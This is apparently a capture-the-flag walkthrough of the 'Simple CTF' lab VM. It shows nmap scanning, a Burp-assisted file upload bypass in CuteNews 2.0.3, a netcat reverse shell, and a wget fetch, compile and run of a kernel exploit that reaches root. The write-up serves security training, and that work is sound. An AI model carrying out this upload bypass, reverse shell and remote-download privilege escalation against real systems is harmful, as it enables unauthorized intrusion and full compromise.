Simple CTF is a boot2root that focuses on the basics of web based hacking. /root/flag.txt is your ultimate goal.
- Get a user shell by uploading a reverse shell and executing it.
- A proxy may help you to upload the file you want, rather than the file that the server expects.
- There are 3 known privesc exploits that work. Some people have had trouble executing one of them unless it was over a reverse shell using a netcat listener.
[email protected]:~# nmap -n -p- -A 192.168.56.104 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Please Login / CuteNews
CuteNews 2.0.3 has an arbitary file upload vulnerability, in the avatar function of a registered user. I first registered an account as
rasta:mouse and logged in. Navigate to
Personal options and select the
Browse button to upload an avatar.
/root/rasta.jpg, and changed the IP address for the callback.
Before the upload, open
burp and turn
intercept on. When you upload your file, use
burp to change the extension of the filename to
php. So it looks something like this:
Once the file has been uploaded, create a
netcat listener and execute your shell.
[email protected]:~# nc -lnvp 1234 listening on [any] 1234 ... [email protected]:~# curl http://192.168.56.104/uploads/avatar_rasta_rasta.php connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 52214 Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux 08:01:39 up 37 min, 0 users, load average: 0.00, 0.01, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
This VM is running Ubuntu 14.04.1, which has a kernel vulnerability that will take us straight to
$ uname -a Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
python -m SimpleHTTPServer on my Kali box and used
wget to download the exploit source code.
gcc is installed on the VM, so we can compile and run without issue.
$ wget http://192.168.56.102:8000/x.c $ ls -l -rw-rw-rw- 1 www-data www-data 5123 Apr 16 06:20 x.c $ gcc x.c -o x $ ./x spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library sh: 0: can't access tty; job control turned off # whoami root
# cat /root/flag.txt U wyn teh Interwebs!!1eleven11!!1! Hack the planet!